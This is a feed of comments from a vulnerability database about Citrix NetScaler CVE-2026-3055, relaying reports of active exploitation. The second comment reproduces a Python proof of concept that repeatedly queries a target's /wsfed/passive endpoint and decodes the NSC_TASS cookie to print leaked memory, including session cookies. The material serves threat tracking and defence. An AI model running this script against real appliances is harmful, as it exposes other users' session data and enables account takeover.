Most recent comments.

https://db.gcve.eu/comments/feed Most recent comments. 2026-04-03T21:50:32.534284+00:00 Vulnerability-Lookup info@gcve.eu python-feedgen Contains only the most 10 recent comments. https://db.gcve.eu/comment/fdd15828-339e-4711-a71a-6b92792a4aaf Seems to be exploited and confirmed by Defused 2026-04-03T21:50:32.538483+00:00 sync_user http://db.gcve.eu/user/sync_user 🚨Citrix NetScaler CVE-2026-3055 is being actively exploited in the wild Attackers send crafted SAMLRequest payloads to /saml/login omitting the AssertionConsumerServiceURL field, triggering the appliance to leak memory contents via the NSC_TASS cookie. Our honeypot data shows exploitation activity from the same payload structure as the @watchtowrcyber PoC. Track exploitation of our Citrix honeypots 👉 https://console.defusedcyber.com/capabilities https://x.com/defusedcyber/status/2038266417091326156?s=46 2026-03-29T17:36:59.391710+00:00 https://db.gcve.eu/comment/596d1296-f91f-4f84-a3e6-03aa10878635 Please, We Beg, Just One Weekend Free Of Appliances (Citrix NetScaler CVE-2026-3055 Memory Overread Part 2) 2026-04-03T21:50:32.536872+00:00 sync_user http://db.gcve.eu/user/sync_user For more details -> https://labs.watchtowr.com/please-we-beg-just-one-weekend-free-of-appliances-citrix-netscaler-cve-2026-3055-memory-overread-part-2/ which includes ~~~python import base64 import requests import urllib3 urllib3.disable_warnings() BANNER = """ __ ___ ___________ __ _ ______ _/ |__ ____ | |_\\__ ____\\____ _ ________ \\ \\/ \\/ \\__ \\ ___/ ___\\| | \\| | / _ \\ \\/ \\/ \\_ __ \\ \\ / / __ \\| | \\ \\___| Y | |( <_> \\ / | | \\/ \\/\\_/ (____ |__| \\___ |___|__|__ | \\__ / \\/\\_/ |__| \\/ \\/ \\/ watchTowr-vs-Citrix-NetScaler-CVE-2026-3055.py (*) Citrix NetScaler Memory Overread Detection Artifact Generator - Aliz Hammond of watchTowr (@watchTowrcyber) CVEs: [CVE-2026-3055] """ print(BANNER) while True: try: resp = requests.get("https://<host>/wsfed/passive?wctx", verify=False, allow_redirects=False) tass = resp.cookies.get('NSC_TASS', None) if tass is None: continue tassText = base64.b64decode(tass) memIdx = tassText.find(b'wctx=') if memIdx != -1: bled = tassText[memIdx+5:] cookiePos = bled.find(b'Cookie') if cookiePos != -1: print(bled[cookiePos:].decode('ascii', errors='ignore')) except Exception: pass ~~~ 2026-03-30T06:20:52.093292+00:00